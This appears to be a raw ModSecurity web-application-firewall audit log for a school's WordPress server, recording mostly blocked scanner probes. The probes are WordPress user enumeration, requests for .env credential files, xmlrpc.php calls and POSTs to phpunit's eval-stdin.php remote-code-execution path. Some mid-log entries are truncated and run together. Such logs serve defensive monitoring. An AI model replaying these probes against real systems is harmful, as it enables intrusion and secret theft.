AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ec260d3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec260d3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747071359469839 3303 (- - -) Stopwatch2: 1747071359469839 3303; combined=1518, p1=553, p2=926, p3=0, p4=0, p5=39, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec260d3d-Z-- --1e39133e-A-- [13/May/2025:01:05:20 +0700] aCI4YBKpX3ymKhxxBsirSQAAAEA 103.236.140.4 59082 103.236.140.4 8181 --1e39133e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 77.48.74.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 77.48.74.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1e39133e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e39133e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747073120505051 3286 (- - -) Stopwatch2: 1747073120505051 3286; combined=1464, p1=492, p2=940, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e39133e-Z-- --585e9662-A-- [13/May/2025:01:14:11 +0700] aCI6cxLjIumP119c9pqOcAAAAAA 103.236.140.4 42188 103.236.140.4 8181 --585e9662-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.47.97.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.47.97.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --585e9662-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --585e9662-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747073651547706 2794 (- - -) Stopwatch2: 1747073651547706 2794; combined=1325, p1=392, p2=901, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --585e9662-Z-- --d750c76b-A-- [13/May/2025:01:16:00 +0700] aCI64BLjIumP119c9pqPGgAAABc 103.236.140.4 44646 103.236.140.4 8181 --d750c76b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.53.62.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.53.62.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d750c76b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d750c76b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747073760039899 2772 (- - -) Stopwatch2: 1747073760039899 2772; combined=1300, p1=493, p2=779, p3=0, p4=0, p5=28, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d750c76b-Z-- --0f9ad727-A-- [13/May/2025:02:05:54 +0700] aCJGkhKpX3ymKhxxBsjAWAAAAE4 103.236.140.4 55274 103.236.140.4 8181 --0f9ad727-B-- GET /.env.test HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.230 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.230 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --0f9ad727-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f9ad727-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747076754785033 900 (- - -) Stopwatch2: 1747076754785033 900; combined=447, p1=405, p2=0, p3=0, p4=0, p5=42, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f9ad727-Z-- --e544015c-A-- [13/May/2025:02:06:01 +0700] aCJGmRKpX3ymKhxxBsjAcAAAAEM 103.236.140.4 55416 103.236.140.4 8181 --e544015c-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.230 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.230 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --e544015c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e544015c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747076761372053 730 (- - -) Stopwatch2: 1747076761372053 730; combined=318, p1=274, p2=0, p3=0, p4=0, p5=44, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e544015c-Z-- --082ec00f-A-- [13/May/2025:02:06:03 +0700] aCJGmxKpX3ymKhxxBsjAegAAAEw 103.236.140.4 55466 103.236.140.4 8181 --082ec00f-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.230 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.230 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --082ec00f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --082ec00f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747076763852789 905 (- - -) Stopwatch2: 1747076763852789 905; combined=389, p1=349, p2=0, p3=0, p4=0, p5=40, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --082ec00f-Z-- --bd2eae25-A-- [13/May/2025:02:06:06 +0700] aCJGnhKpX3ymKhxxBsjAgQAAAEU 103.236.140.4 55516 103.236.140.4 8181 --bd2eae25-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.230 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.230 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --bd2eae25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd2eae25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747076766621191 816 (- - -) Stopwatch2: 1747076766621191 816; combined=379, p1=336, p2=0, p3=0, p4=0, p5=43, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd2eae25-Z-- --46fb0a24-A-- [13/May/2025:02:06:09 +0700] aCJGoRKpX3ymKhxxBsjAigAAAEk 103.236.140.4 55566 103.236.140.4 8181 --46fb0a24-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.230 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.230 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --46fb0a24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46fb0a24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747076769224811 775 (- - -) Stopwatch2: 1747076769224811 775; combined=307, p1=262, p2=0, p3=0, p4=0, p5=45, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46fb0a24-Z-- --5f09ad4e-A-- [13/May/2025:02:13:20 +0700] aCJIUH4i-S7TW27OkGkGzQAAAMM 103.236.140.4 36896 103.236.140.4 8181 --5f09ad4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5f09ad4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f09ad4e-H-- Message: Access denied with code 403 (phase 2). 
Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747077200021002 3106 (- - -) Stopwatch2: 1747077200021002 3106; combined=1372, p1=459, p2=879, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f09ad4e-Z-- --48b81c5e-A-- [13/May/2025:02:13:22 +0700] aCJIUhKpX3ymKhxxBsjDjwAAAEc 103.236.140.4 36944 103.236.140.4 8181 --48b81c5e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.234 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --48b81c5e-C-- demo.sayHello --48b81c5e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --48b81c5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747077202803785 8406 (- - -) Stopwatch2: 1747077202803785 8406; combined=6550, p1=784, p2=5444, p3=50, p4=69, p5=116, sr=95, sw=87, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48b81c5e-Z-- --a8f0e116-A-- [13/May/2025:02:17:28 +0700] aCJJSBKpX3ymKhxxBsjEkgAAAEs 103.236.140.4 42724 103.236.140.4 8181 --a8f0e116-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.16.186.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.16.186.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a8f0e116-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8f0e116-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747077448771891 2849 (- - -) Stopwatch2: 1747077448771891 2849; combined=1350, p1=429, p2=891, p3=0, p4=0, p5=29, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8f0e116-Z-- --525bf14d-A-- [13/May/2025:02:39:19 +0700] aCJOZ-ll0ld2l7Li0sfLtgAAAJI 103.236.140.4 43884 103.236.140.4 8181 --525bf14d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.145.185.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.145.185.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --525bf14d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --525bf14d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747078759994975 3128 (- - -) Stopwatch2: 1747078759994975 3128; combined=1243, p1=470, p2=740, p3=0, p4=0, p5=32, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --525bf14d-Z-- --cc719548-A-- [13/May/2025:02:42:55 +0700] aCJPP-ll0ld2l7Li0sfNjgAAAIs 103.236.140.4 49186 103.236.140.4 8181 --cc719548-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 118.91.172.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.91.172.231 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cc719548-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc719548-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747078975897207 2750 (- - -) Stopwatch2: 1747078975897207 2750; combined=1219, p1=409, p2=781, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc719548-Z-- --729fc834-A-- [13/May/2025:03:02:06 +0700] aCJTvn4i-S7TW27OkGkgiAAAAMU 103.236.140.4 38802 103.236.140.4 8181 --729fc834-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.68.193.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.68.193.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --729fc834-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --729fc834-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747080126009442 2523 (- - -) Stopwatch2: 1747080126009442 2523; combined=1266, p1=398, p2=835, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --729fc834-Z-- --95805043-A-- [13/May/2025:03:04:14 +0700] aCJUPhLjIumP119c9pq3jgAAAAM 103.236.140.4 43114 103.236.140.4 8181 --95805043-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 152.42.227.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.227.246 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --95805043-C-- --95805043-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95805043-E-- --95805043-H-- Message: Access denied with code 403 (phase 2). String match " --7f19d112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f19d112-E-- --7f19d112-H-- Message: Access denied with code 403 (phase 2). String match " --57f28342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57f28342-E-- --57f28342-H-- Message: Access denied with code 403 (phase 2). 
String match " --33d2935c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33d2935c-H-- Message: Access denied with code 403 (phase 2). String match " --ab820a37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab820a37-E-- --ab820a37-H-- Message: Access denied with code 403 (phase 2). String match " --13d41745-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13d41745-E-- --13d41745-H-- Message: Access denied with code 403 (phase 2). String match " --afd9ad05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afd9ad05-H-- Message: Access denied with code 403 (phase 2). String match " --82ecc732-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82ecc732-E-- --82ecc732-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --508f641d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --508f641d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747104775413335 4580 (- - -) Stopwatch2: 1747104775413335 4580; combined=3128, p1=424, p2=2526, p3=24, p4=25, p5=74, sr=52, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --508f641d-Z-- --abc1112b-A-- [13/May/2025:10:03:35 +0700] aCK2h43mg5f2L4Eof6PIwgAAANU 103.236.140.4 36064 103.236.140.4 8181 --abc1112b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 51.8.118.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 51.8.118.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --abc1112b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abc1112b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747105415646761 3409 (- - -) Stopwatch2: 1747105415646761 3409; combined=1508, p1=530, p2=947, p3=0, p4=0, p5=31, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abc1112b-Z-- --5e332e4e-A-- [13/May/2025:10:06:31 +0700] aCK3N43mg5f2L4Eof6PI1QAAAMM 103.236.140.4 36132 103.236.140.4 8181 --5e332e4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, 